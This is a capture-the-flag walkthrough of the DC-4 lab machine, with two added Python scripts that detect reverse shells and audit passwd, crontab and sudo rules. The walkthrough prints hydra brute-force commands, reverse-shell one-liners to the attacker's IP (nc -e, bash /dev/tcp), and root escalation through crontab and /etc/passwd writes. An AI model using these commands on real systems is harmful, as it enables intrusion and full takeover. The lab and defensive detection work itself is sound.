DC-4

Information gathering

First, use nmap to find the target's IP on the subnet:

┌──(root💀AGsite)-[~]
└─# nmap -sP 192.168.33.0/24


Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-27 21:01 EDT
Nmap scan report for 192.168.33.1
Host is up (0.00013s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.33.2
Host is up (0.00015s latency).
MAC Address: 00:50:56:F3:FB:E6 (VMware)
Nmap scan report for 192.168.33.140
Host is up (0.00011s latency).
MAC Address: 00:0C:29:64:8A:3D (VMware)
Nmap scan report for 192.168.33.254
Host is up (0.00011s latency).
MAC Address: 00:50:56:F1:32:23 (VMware)
Nmap scan report for 192.168.33.128
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 28.11 seconds


┌──(root💀AGsite)-[~]
└─# nmap -p- -A -v 192.168.33.140


Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-27 21:03 EDT
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 21:03
Completed NSE at 21:03, 0.00s elapsed
Initiating NSE at 21:03
Completed NSE at 21:03, 0.00s elapsed
Initiating NSE at 21:03
Completed NSE at 21:03, 0.00s elapsed
Initiating ARP Ping Scan at 21:03
Scanning 192.168.33.140 [1 port]
Completed ARP Ping Scan at 21:03, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:03
Completed Parallel DNS resolution of 1 host. at 21:03, 13.00s elapsed
Initiating SYN Stealth Scan at 21:03
Scanning 192.168.33.140 [65535 ports]
Discovered open port 80/tcp on 192.168.33.140
Discovered open port 22/tcp on 192.168.33.140
Completed SYN Stealth Scan at 21:03, 1.50s elapsed (65535 total ports)
Initiating Service scan at 21:03
Scanning 2 services on 192.168.33.140
Completed Service scan at 21:03, 6.10s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 192.168.33.140
NSE: Script scanning 192.168.33.140.
Initiating NSE at 21:03
Completed NSE at 21:03, 0.18s elapsed
Initiating NSE at 21:03
Completed NSE at 21:03, 0.01s elapsed
Initiating NSE at 21:03
Completed NSE at 21:03, 0.00s elapsed
Nmap scan report for 192.168.33.140
Host is up (0.00047s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA)
|   256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA)
|_  256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (ED25519)
80/tcp open  http    nginx 1.15.10
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-server-header: nginx/1.15.10
|_http-title: System Tools
MAC Address: 00:0C:29:64:8A:3D (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 0.003 days (since Tue Apr 27 20:59:04 2021)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=257 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


TRACEROUTE
HOP RTT     ADDRESS
1   0.47 ms 192.168.33.140


NSE: Script Post-scanning.
Initiating NSE at 21:03
Completed NSE at 21:03, 0.00s elapsed
Initiating NSE at 21:03
Completed NSE at 21:03, 0.00s elapsed
Initiating NSE at 21:03
Completed NSE at 21:03, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.53 seconds
           Raw packets sent: 65558 (2.885MB) | Rcvd: 65550 (2.623MB)

Run dirsearch against the web root:

Target: http://192.168.33.140/

Output File: /root/tools/dirsearch/reports/192.168.33.140/_21-04-27_21-12-32.txt

[21:12:32] Starting:
[21:12:39] 302 -  704B  - /command.php  ->  index.php
[21:12:40] 301 -  170B  - /css  ->  http://192.168.33.140/css/
[21:12:41] 301 -  170B  - /images  ->  http://192.168.33.140/images/
[21:12:41] 403 -  556B  - /images/
[21:12:41] 200 -  506B  - /index.php
[21:12:42] 302 -  206B  - /login.php  ->  index.php
[21:12:42] 302 -  163B  - /logout.php  ->  index.php

Brute-forcing a weak password

Nothing suspicious shows up in the directory scan, but the site presents a login form, so we try brute-forcing it with hydra:

┌──(root💀AGsite)-[~/tools/pass]
└─# hydra -l admin -P rockyou.txt 192.168.33.140 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout"                                        
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).


Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-04-28 01:28:25
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://192.168.33.140:80/login.php:username=^USER^&password=^PASS^:S=logout
[80][http-post-form] host: 192.168.33.140   login: admin   password: happy
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-04-28 01:28:36

This gives admin's password: happy

The :S parameter of hydra is set to logout because dirsearch found logout.php earlier, so we guess that a successful login returns a page containing a logout link.

POST form submission, cracking a web login:


hydra -l 用户名 -P 密码字典 -s 80 ip http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password"
hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "login.php:id=^USER^&passwd=^PASS^:<title>wrong username or password</title>"


(Parameter notes for the second command: -t 3 runs 3 parallel tasks, -l admin sets the username to admin, -P pass.txt supplies the password wordlist, -o out.txt saves the results to out.txt, -f stops as soon as one password is found, 10.36.16.18 is the target IP, and http-post-form means the password form is submitted via HTTP POST. In the first command, 用户名 stands for the username and 密码字典 for the password wordlist.)

Reverse shell

First, set Kali listening on port 2233:

nc -lvp 2233

Then capture the request with Burp and, in the command-execution field, enter:

nc -e /bin/bash 192.168.33.128【Kali's IP】 2233

Some targets don't have nc, though, so bash is the most reliable choice:

bash -c 'bash -i >& /dev/tcp/192.168.33.128【Kali's IP】/2233 0>&1'

In the POST body, however, & is parsed as a field separator, so we URL-encode it as %26:

bash -c 'bash -i >%26 /dev/tcp/192.168.33.128【Kali's IP】/2233 0>%261'

Connected!!!

If the connection came in through nc, we may need to run the following to get an interactive TTY:

python -c "import pty;pty.spawn('/bin/bash')"
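From the defender's side, the connection just established stands out in two ways: a shell (bash, sh, nc) is running under the web server's account as a descendant of the application worker, and the shell's file descriptors 0, 1 and 2 are a TCP socket to an outside address, which is exactly what `bash -i >& /dev/tcp/... 0>&1` produces. The Python below is an added example, not part of this walkthrough and not a tool on the DC-4 box; it parses constructed `ps -eo pid,ppid,user,comm` and `ss -tnp` output (the sample layouts are assumptions) and reports processes matching that pattern. The names in SHELLS and WEB_WORKERS are assumptions to be tuned per host.

```python
import re

# Process names that should not be holding a network socket on a web host, and
# the server/worker names whose children we care about. Both sets are
# assumptions for this example; tune them to the host being audited.
SHELLS = {'sh', 'bash', 'dash', 'zsh', 'nc', 'ncat', 'netcat', 'python', 'python3', 'perl'}
WEB_WORKERS = {'nginx', 'apache2', 'httpd', 'php-fpm', 'php-fpm7.0'}

def parse_ps(text):
    """{pid: {'ppid', 'user', 'comm'}} from `ps -eo pid,ppid,user,comm` output (header skipped)."""
    procs = {}
    for line in text.splitlines()[1:]:
        parts = line.split(None, 3)
        if len(parts) == 4:
            pid, ppid, user, comm = parts
            procs[int(pid)] = {'ppid': int(ppid), 'user': user, 'comm': comm}
    return procs

# one socket owner inside the ss "users:(...)" column
SOCK_RE = re.compile(r'\("(?P<comm>[^"]+)",pid=(?P<pid>\d+),fd=(?P<fd>\d+)\)')

def parse_ss(text):
    """[(pid, fd, peer)] for every established TCP socket in `ss -tnp` output."""
    socks = []
    for line in text.splitlines()[1:]:
        cols = line.split()
        if len(cols) >= 5 and cols[0] == 'ESTAB':
            peer = cols[4]
            for m in SOCK_RE.finditer(line):
                socks.append((int(m['pid']), int(m['fd']), peer))
    return socks

def ancestors(procs, pid):
    """Command names of pid's parent, grandparent, ... up to init (cycle-safe)."""
    chain, seen = [], set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        pid = procs[pid]['ppid']
        if pid in procs:
            chain.append(procs[pid]['comm'])
    return chain

def find_reverse_shells(ps_text, ss_text):
    """Shell-like processes that own an established socket and are either
    descended from a web worker or have stdin/stdout/stderr bound to the socket."""
    procs = parse_ps(ps_text)
    findings = {}
    for pid, fd, peer in parse_ss(ss_text):
        proc = procs.get(pid)
        if not proc or proc['comm'] not in SHELLS:
            continue
        web_parent = next((a for a in ancestors(procs, pid) if a in WEB_WORKERS), None)
        stdio_bound = fd in (0, 1, 2)
        if web_parent or stdio_bound:
            entry = findings.setdefault(pid, {
                'comm': proc['comm'], 'user': proc['user'], 'peer': peer,
                'spawned_by': web_parent, 'stdio_on_socket': False})
            entry['stdio_on_socket'] = entry['stdio_on_socket'] or stdio_bound
    return findings

# Constructed sample output (made up for this example, not captured from DC-4).
PS_OUTPUT = """\
  PID  PPID USER     COMMAND
    1     0 root     systemd
  600     1 root     php-fpm7.0
  601   600 www-data php-fpm7.0
  602     1 root     nginx
  603   602 www-data nginx
 1337   601 www-data sh
 1338  1337 www-data bash
 1400     1 jim      bash
 1401  1400 jim      ssh
"""

SS_OUTPUT = """\
State Recv-Q Send-Q Local Address:Port    Peer Address:Port    Process
ESTAB 0      0      192.168.33.140:80     192.168.33.128:51234 users:(("nginx",pid=603,fd=12))
ESTAB 0      0      192.168.33.140:48122  192.168.33.128:2233  users:(("bash",pid=1338,fd=0),("bash",pid=1338,fd=1),("bash",pid=1338,fd=2))
ESTAB 0      0      192.168.33.140:39010  192.168.33.20:22     users:(("ssh",pid=1401,fd=3))
"""

if __name__ == '__main__':
    for pid, info in find_reverse_shells(PS_OUTPUT, SS_OUTPUT).items():
        print(pid, info)
```

On the sample data only pid 1338 is reported: a bash owned by www-data, descended from php-fpm7.0, with all three standard descriptors on a socket to 192.168.33.128:2233. Jim's ssh client and the nginx worker both hold sockets but are not shells, so they are ignored. On a live host feed the script the real output of the two commands; the "stdio on socket" signal is the stronger of the two, since an interactive shell never has fd 0-2 on a TCP socket in normal operation.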

Brute-forcing SSH

In jim's home directory we find oldpassword.bak; then we use awk to pull the usernames out of /etc/passwd:

awk -F ':' '{print $1}' /etc/passwd

Then try brute-forcing SSH with those lists:

hydra -L olduser -P oldpass ssh://192.168.33.140:22

The brute-force yields jim's password: jibril04

Then log in over ssh:

ssh jim@192.168.33.140

After logging in there is a mail notification; opening the mailbox shows nothing useful:

jim@dc-4:/var/mail$ cat /home/jim/mbox
From root@dc-4 Sat Apr 06 20:20:04 2019
Return-path: <root@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 20:20:04 +1000
Received: from root by dc-4 with local (Exim 4.89)
        (envelope-from <root@dc-4>)
        id 1hCiQe-0000gc-EC
        for jim@dc-4; Sat, 06 Apr 2019 20:20:04 +1000
To: jim@dc-4
Subject: Test
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCiQe-0000gc-EC@dc-4>
From: root <root@dc-4>
Date: Sat, 06 Apr 2019 20:20:04 +1000
Status: RO


This is a test.

So we keep looking, and find another message in /var/mail/jim:

Hi Jim,


I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.


Password is:  ^xHhA&hvim0y


See ya,
Charles

This reveals Charles's password: ^xHhA&hvim0y

So we switch users with su - charles.

Privilege escalation via teehee

Running sudo -l shows:

charles@dc-4:/home$ sudo -l
Matching Defaults entries for charles on dc-4:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin


User charles may run the following commands on dc-4:
    (root) NOPASSWD: /usr/bin/teehee

So teehee can be used to escalate privileges; let's look at what it does:

charles@dc-4:/home$ teehee --help
Usage: teehee [OPTION]... [FILE]...
Copy standard input to each FILE, and also to standard output.


  -a, --append              append to the given FILEs, do not overwrite
  -i, --ignore-interrupts   ignore interrupt signals
  -p                        diagnose errors writing to non pipes
      --output-error[=MODE]   set behavior on write error.  See MODE below
      --help     display this help and exit
      --version  output version information and exit


MODE determines behavior with write errors on the outputs:
  'warn'         diagnose errors writing to any output
  'warn-nopipe'  diagnose errors writing to any output not a pipe
  'exit'         exit on error writing to any output
  'exit-nopipe'  exit on error writing to any output not a pipe
The default MODE for the -p option is 'warn-nopipe'.
The default operation when --output-error is not specified, is to
exit immediately on error writing to a pipe, and diagnose errors
writing to non pipe outputs.


GNU coreutils online help: <http://www.gnu.org/software/coreutils/>
Full documentation at: <http://www.gnu.org/software/coreutils/tee>
or available locally via: info '(coreutils) tee invocation'

In short, it behaves like tee:

Example

Use tee to save the user's input to both file1 and file2 at the same time, with the following command:


$ tee file1 file2 # copy the input into both files


After the command runs, it waits for the user to type the data to save, as shown below:


My Linux # the user types a line
My Linux # tee echoes it back to standard output


To sum up: we can now write to any file as root, which gives two routes:

1. Write a chmod command into the scheduled tasks in /etc/crontab
2. Append a user with uid 0 directly to /etc/passwd

Changing permissions via a cron job

First, check the permissions of /bin/sh:

ls -al /bin/sh

Since teehee runs as root through sudo, we write a line into the system crontab:

sudo teehee /etc/crontab


* * * * * root chmod 4777 /bin/sh

Then run /bin/sh.


Writing a uid-0 user straight into passwd

echo "a1batr0ss::0:0:::/bin/bash" | sudo teehee -a /etc/passwd


su - a1batr0ss

and we have root.
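The two escalation routes just shown (the chmod line in /etc/crontab, the extra uid-0 entry in /etc/passwd) and the sudo rule that made them possible are all visible in three files a host audit can read. The Python script below is an added example, not part of this walkthrough; it checks constructed copies of /etc/passwd, /etc/crontab and `sudo -l` output for exactly these conditions. The set of "dangerous to grant" binaries is an assumption (teehee is in it only because DC-4 renamed tee to that name; on other hosts it is the real tee and its relatives that matter).

```python
import re

# Binaries a sudo rule should almost never grant as root: each can write to or
# append to an arbitrary file, or break out into a shell, which is all the
# crontab and passwd routes above need. This set is an assumption for the example.
ESCALATION_BINARIES = {'tee', 'teehee', 'cp', 'mv', 'dd', 'vi', 'vim', 'nano',
                       'less', 'more', 'python', 'python3', 'perl', 'env', 'find'}

def extra_uid0_accounts(passwd_text):
    """{name: [reasons]} for /etc/passwd entries that are uid 0 but not root,
    or that have an empty password field (login with no password at all)."""
    findings = {}
    for line in passwd_text.splitlines():
        fields = line.split(':')
        if len(fields) != 7:
            continue                      # malformed line, not a valid entry
        name, pw, uid = fields[0], fields[1], fields[2]
        reasons = []
        if uid == '0' and name != 'root':
            reasons.append('uid 0 but not root')
        if pw == '':
            reasons.append('empty password field')
        if reasons:
            findings[name] = reasons
    return findings

# chmod that sets a setuid/setgid bit, numerically (4xxx, 2xxx, 6xxx) or symbolically (+s)
SETUID_CHMOD = re.compile(r'\bchmod\b[^\n]*?(?:\b[2467][0-7]{3}\b|\+s\b)')
SENSITIVE_FILES = ('/etc/passwd', '/etc/shadow', '/etc/sudoers')

def suspicious_cron_entries(crontab_text):
    """Commands in a system crontab (the format with a user column) that run as
    root and set a setuid bit or touch an account/sudo database file."""
    hits = []
    for line in crontab_text.splitlines():
        s = line.strip()
        if not s or s.startswith('#') or '=' in s.split()[0]:
            continue                      # blank, comment, or VAR=value line
        fields = s.split(None, 6)
        if len(fields) < 7:
            continue
        user, cmd = fields[5], fields[6]
        if user == 'root' and (SETUID_CHMOD.search(cmd) or any(f in cmd for f in SENSITIVE_FILES)):
            hits.append(cmd)
    return hits

# one rule line from `sudo -l`: "(runas) [TAG: ...] command"
SUDO_RULE = re.compile(r'^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S+)')

def risky_sudo_rules(sudo_l_text):
    """[(command, nopasswd)] for rules that run ALL or an escalation binary as root."""
    out = []
    for line in sudo_l_text.splitlines():
        m = SUDO_RULE.match(line)
        if not m:
            continue
        cmd = m['cmd']
        base = cmd.rsplit('/', 1)[-1]
        as_root = 'root' in m['runas'] or 'ALL' in m['runas']
        if as_root and (cmd == 'ALL' or base in ESCALATION_BINARIES):
            out.append((cmd, 'NOPASSWD' in m['tags']))
    return out

# Constructed inputs (made up for this example, not copied from the DC-4 box).
PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
jim:x:1001:1001:Jim,,,:/home/jim:/bin/bash
charles:x:1002:1002:Charles,,,:/home/charles:/bin/bash
a1batr0ss::0:0:::/bin/bash
"""

CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
* * * * * root chmod 4777 /bin/sh
"""

SUDO_L = r"""Matching Defaults entries for charles on dc-4:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User charles may run the following commands on dc-4:
    (root) NOPASSWD: /usr/bin/teehee
    (root) /usr/bin/less
"""

if __name__ == '__main__':
    print(extra_uid0_accounts(PASSWD))
    print(suspicious_cron_entries(CRONTAB))
    print(risky_sudo_rules(SUDO_L))
```

On the sample inputs the script reports a1batr0ss (uid 0 and no password), the `chmod 4777 /bin/sh` cron job, and the NOPASSWD teehee rule. The passwd and crontab checks are cheap enough to run from a periodic integrity job; the sudo check is the one to apply before a rule is granted, since any binary that can write a file as root is equivalent to handing out root.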